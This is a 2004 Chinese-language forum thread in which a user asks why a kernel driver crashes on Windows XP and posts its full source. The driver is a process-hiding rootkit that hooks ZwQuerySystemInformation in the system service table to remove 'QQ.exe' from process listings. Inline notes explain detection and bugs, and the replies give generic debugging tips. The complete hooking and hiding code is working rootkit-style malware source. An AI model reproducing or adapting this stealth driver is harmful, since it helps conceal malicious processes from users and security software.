在win2k下装了windows ddk 2600,能不能编译用于xp的内核驱动?
我在win2k下装了winxp ddk,即windows ddk 2600,并对一个内核驱动文件.sys用build -bw直接进行编译,编译显示成功。但把生成的sys文件复制到winxp后进行加载却出现蓝屏。为什么?
注:该内核驱动文件.sys用win2000 ddk编译后在win2k下加载能够正常运行。 |
沙发#
发布于:2004-08-21 10:55
没有高手能看出其中的错误吗?
板凳#
发布于:2004-08-20 18:44
这是一段用于进程隐藏的代码,能在win2k+win2000DDk下编译并正常运行,但在win2k+winxp ddk下编译正常后却不能在winxp下运行,错误提示为访问。不知道错哪了,大家有兴趣的话可以看一看。
// ProcessHide.sys (as posted to the thread): an x86 kernel driver that removes
// entries named "QQ.exe" from the process list returned by
// ZwQuerySystemInformation, by replacing that service's slot in the kernel's
// system service table (SSDT) with a filtering wrapper.
//
// Reader notes (defender's view):
//  - The only modification made to the system is one pointer store into the
//    service table (HookSystemCall). After that store, the table slot for
//    ZwQuerySystemInformation points into this driver's image instead of the
//    kernel's; scanners that compare the live table against the kernel's
//    exported addresses observe exactly this.
//  - The filtering only affects callers that go through this service.
//    Cross-view enumeration (comparing this API's result with a process view
//    obtained another way) exposes the removed entry.
//  - In free (non-DBG) builds DriverUnload is never set (see DriverEntry), so
//    the hook stays in place until reboot.
#include "ntddk.h"
#include "stdarg.h"
#include "stdio.h"

//----------------------------------------------------------------------
// DEFINES
//----------------------------------------------------------------------
// Checked builds keep DbgPrint; free builds compile the double-parenthesised
// calls below away entirely.
#if DBG
#define DbgPrint(arg) DbgPrint arg
#else
#define DbgPrint(arg)
#endif

//
// 32768-65535 are reserved for use by customers
//
#define FILE_DEVICE_PROCESSHIDE 0x00008306

//
// available only on x86 now
//
// Resolves a service-table slot from a Zw* stub: the ULONG at offset 1 of
// the stub is read as the service index (an x86 stub-layout assumption that is
// never validated here) and used to index ServiceTable->ServiceTable.
//
#define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]

typedef unsigned long DWORD;
typedef unsigned short WORD;
typedef int BOOL;

//
// Undocumented layouts for the buffer that ZwQuerySystemInformation fills for
// information class 5 (SystemProcessInformation). The field list below is the
// author's; it is not verified against any particular kernel build.
// (Original comment referred to ZwQueryDirectoryFile, which is not what this
// driver touches.)
//
struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES {
    ULONG NextEntryDelta;               // byte offset to the next entry; 0 marks the last one
    ULONG ThreadCount;
    ULONG Reserved[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;         // the only field the hook inspects
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    struct _SYSTEM_THREADS Threads[1];
};

//
// Definition for system call service table (the author's view of the
// KeServiceDescriptorTable layout; only ServiceTable is used).
//
typedef struct _SRVTABLE {
    PVOID *ServiceTable;
    ULONG LowCall;
    ULONG HiCall;
    PVOID *ArgTable;
} SRVTABLE, *PSRVTABLE;

// Saved original service routine, filled in by HookSystemCall.
NTSTATUS (*RealZwQuerySystemInformation)(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);

//----------------------------------------------------------------------
// GLOBALS
//----------------------------------------------------------------------
//
// Pointer to system global service table
//
PSRVTABLE ServiceTable;
extern PSRVTABLE KeServiceDescriptorTable;
PDEVICE_OBJECT ControlDeviceObject;

//----------------------------------------------------------------------
// FORWARD DEFINES
//----------------------------------------------------------------------
NTSTATUS ProcesshideDispatch( IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp );
VOID ProcesshideUnload( IN PDRIVER_OBJECT DriverObject );
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength );

//======================================================================
// H O O K   R O U T I N E S
//======================================================================

//----------------------------------------------------------------------
//
// HookZwQuerySystemInformation
//
// Replacement for the ZwQuerySystemInformation service. Calls the saved
// original, and when the request was for information class 5 walks the
// returned list and unlinks every entry whose name starts with aWinlogon
// ("QQ.exe") by folding its NextEntryDelta into the previous entry.
// Returns whatever the original returned; the buffer is edited in place.
//
// Review notes on the body:
//  - process_uname, process_name1, process_name2 and aProcessName are
//    declared but never used.
//  - The name test is a prefix comparison of strlen(aWinlogon) bytes; it does
//    not check that the converted name is at least that long.
//  - RtlUnicodeStringToAnsiString is called with AllocateDestinationString =
//    TRUE on every step, but RtlFreeAnsiString runs once per outer iteration,
//    so strings converted inside the inner while(found) loop are not freed.
//  - `(char *)SystemInformation += ...` and `(char*)curr += ...` rely on a
//    cast-as-lvalue compiler extension; this is not standard C.
//
//----------------------------------------------------------------------
NTSTATUS HookZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength)
{
    NTSTATUS rc;
    ANSI_STRING process_name,process_uname,process_name1,process_name2;
    BOOL g_hide_proc = TRUE;            // local, always TRUE: the filter is never switched off
    CHAR aProcessName[80];
    char aWinlogon[] = "QQ.exe";        // name prefix to remove from the list
    int found;

    // Call the original ZwQuerySystemInformation first; the list is filtered afterwards.
    rc =(RealZwQuerySystemInformation)(
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength );

    if(NT_SUCCESS(rc)) {
        if( g_hide_proc && (5 == SystemInformationClass)) {
            // Treat the returned buffer as the process-entry list.
            struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
            struct _SYSTEM_PROCESSES *prev = NULL;

            // Walk the list entry by entry.
            while(curr) {
                RtlUnicodeStringToAnsiString(&process_name,&curr->ProcessName, TRUE);
                if((0 < process_name.Length) && (255 >process_name.Length)) {
                    found=0;
                    if(RtlCompareMemory(process_name.Buffer,aWinlogon,strlen(aWinlogon)) == strlen(aWinlogon)) {
                        found =1;
                    }

                    // If the current entry matches, unlink it (and any run of
                    // consecutive matches) by extending the previous entry's delta.
                    while(found) {
                        if(prev) {
                            if(curr->NextEntryDelta) {
                                prev->NextEntryDelta +=curr->NextEntryDelta;
                            } else {
                                prev->NextEntryDelta = 0;
                            }
                        } else {
                            // No previous entry: the match is the list head, so the
                            // local view of the buffer start is moved past it. Note
                            // the caller's buffer pointer itself is not changed.
                            if(curr->NextEntryDelta) {
                                (char *)SystemInformation +=curr->NextEntryDelta;
                            } else {
                                SystemInformation = NULL;
                            }
                        }

                        if(curr->NextEntryDelta) {
                            (char *)curr +=curr->NextEntryDelta;
                        } else {
                            curr =NULL;
                            break;
                        }

                        // Advance along the list and re-test the next entry.
                        found = 0;
                        RtlUnicodeStringToAnsiString(&process_name, &curr->ProcessName, TRUE);
                        if(RtlCompareMemory(process_name.Buffer,aWinlogon,strlen(aWinlogon)) == strlen(aWinlogon)) {
                            found = 1;
                        }
                    }
                }

                if(curr != NULL) {
                    prev = curr;
                    if(curr->NextEntryDelta)
                        ((char*)curr += curr->NextEntryDelta);
                    else
                        curr = NULL;
                }
                RtlFreeAnsiString(&process_name);
            }
        }
    }
    return(rc);
}

//----------------------------------------------------------------------
//
// HookSystemCall
//
// Replaces the ZwQuerySystemInformation entry in the system service table
// with a pointer to our hook routine, saving the real routine address first.
// Two plain pointer stores: no synchronization against concurrent callers,
// and no check that the slot currently holds the expected kernel routine.
//
//----------------------------------------------------------------------
VOID HookSystemCall( void )
{
    //
    // Hook everything
    //
    RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation );
    SYSCALL( ZwQuerySystemInformation ) = (PVOID)HookZwQuerySystemInformation;
}

//----------------------------------------------------------------------
//
// UnhookSystemCall
//
// Restores the saved original pointer into the service table.
//
//----------------------------------------------------------------------
VOID UnhookSystemCall( )
{
    //
    // Unhook everything
    //
    SYSCALL( ZwQuerySystemInformation ) = (PVOID)RealZwQuerySystemInformation;
}

//----------------------------------------------------------------------
//
// ProcesshideDispatch
//
// Dispatch routine for all IRPs registered in DriverEntry. Every request is
// completed with STATUS_SUCCESS and zero bytes; the switch only emits
// checked-build trace output (note the IRP_MJ_SHUTDOWN case prints the
// IRP_MJ_CREATE message). No IOCTL is actually implemented.
//
//----------------------------------------------------------------------
NTSTATUS ProcesshideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
    PIO_STACK_LOCATION irpStack;

    //
    // Go ahead and set the request up as successful
    //
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    //
    // Get a pointer to the current location in the Irp. This is where
    // the function codes and parameters are located.
    //
    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction) {
    case IRP_MJ_CREATE:
        DbgPrint(("Processhide: IRP_MJ_CREATE\n"));
        break;
    case IRP_MJ_SHUTDOWN:
        DbgPrint(("Processhide: IRP_MJ_CREATE\n"));
        break;
    case IRP_MJ_CLOSE:
        DbgPrint(("Processhide: IRP_MJ_CLOSE\n"));
        break;
    case IRP_MJ_DEVICE_CONTROL:
        DbgPrint (("Processhide: IRP_MJ_DEVICE_CONTROL\n"));
        break;
    }

    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return STATUS_SUCCESS;
}

//----------------------------------------------------------------------
//
// ProcesshideUnload
//
// Unload routine (only registered in DBG builds, see DriverEntry): restores
// the service-table entry, then removes the symbolic link and device object.
//
//----------------------------------------------------------------------
VOID ProcesshideUnload( IN PDRIVER_OBJECT DriverObject )
{
    WCHAR deviceLinkBuffer[] = L"\\DosDevices\\ProcessHide" ;
    UNICODE_STRING deviceLinkUnicodeString;

    DbgPrint(("ProcessHide.SYS: unloading\n"));

    //
    // Put the original service pointer back
    //
    UnhookSystemCall();

    //
    // Delete the symbolic link for our device
    //
    RtlInitUnicodeString( &deviceLinkUnicodeString,deviceLinkBuffer );
    IoDeleteSymbolicLink( &deviceLinkUnicodeString );

    //
    // Delete the device object
    //
    IoDeleteDevice( DriverObject->DeviceObject );

    DbgPrint(("ProcessHide.SYS: deleted devices\n"));
}

//----------------------------------------------------------------------
//
// DriverEntry
//
// Installable driver initialization. Creates the control device and its
// symbolic link, wires the dispatch routine, then reads the kernel's
// KeServiceDescriptorTable export into ServiceTable and installs the hook.
// The hook is installed only if device creation and link creation succeed;
// on failure the device/link are torn down and the status is returned.
// DriverUnload is set only under DBG, so a free build cannot be unloaded.
//
//----------------------------------------------------------------------
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
    NTSTATUS ntStatus;
    WCHAR deviceNameBuffer[] = L"\\Device\\ProcessHide";
    UNICODE_STRING deviceNameUnicodeString;
    WCHAR deviceLinkBuffer[] = L"\\DosDevices\\ProcessHide";
    UNICODE_STRING deviceLinkUnicodeString;

    DbgPrint (("my.SYS: entering DriverEntry\n"));

    //
    // Setup our name and symbolic link
    //
    RtlInitUnicodeString (&deviceNameUnicodeString,deviceNameBuffer );
    RtlInitUnicodeString (&deviceLinkUnicodeString,deviceLinkBuffer );

    ntStatus = IoCreateDevice ( DriverObject,
                                0,
                                &deviceNameUnicodeString,
                                FILE_DEVICE_PROCESSHIDE,
                                0,
                                TRUE,
                                &ControlDeviceObject );

    if (NT_SUCCESS(ntStatus)) {
        //
        // Create a symbolic link that the GUI can specify to gain access
        // to this driver/device
        //
        ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,&deviceNameUnicodeString );

        //
        // Create dispatch points for all routines that must be handled
        //
        DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
        DriverObject->MajorFunction[IRP_MJ_CREATE] =
        DriverObject->MajorFunction[IRP_MJ_CLOSE] =
        DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ProcesshideDispatch;
#if DBG
        DriverObject->DriverUnload = ProcesshideUnload;
#endif
    }

    if (!NT_SUCCESS(ntStatus)) {
        DbgPrint(("Processhide: Failed to create our device!\n"));

        //
        // Something went wrong, so clean up (free resources etc)
        //
        if( ControlDeviceObject )
            IoDeleteDevice(ControlDeviceObject );
        IoDeleteSymbolicLink( &deviceLinkUnicodeString );
        return ntStatus;
    }

    //
    // Pointer to system table data structure is an NTOSKRNL export
    //
    ServiceTable = KeServiceDescriptorTable;
    DbgPrint(("Processhide: Servicetable: %x\n", ServiceTable));

    HookSystemCall();
    DbgPrint(("Processhide: Hook System Call"));

    return STATUS_SUCCESS;
}
地板#
发布于:2004-08-18 15:39
驱动中都是使用UNICODE的所以尽量用WCHAR不要用CHAR
地下室#
发布于:2004-08-18 13:56
你把源码贴出来,看看吧,应该是没有问题的.
5楼#
发布于:2004-08-17 19:04
常规应该没问题,代码贴出来看看。 |
6楼#
发布于:2004-08-17 17:54
常规应该没问题,代码贴出来看看。
7楼#
发布于:2004-08-17 17:40
跟踪一下吗,
2000/xp内核都是nt5,应该没问题 |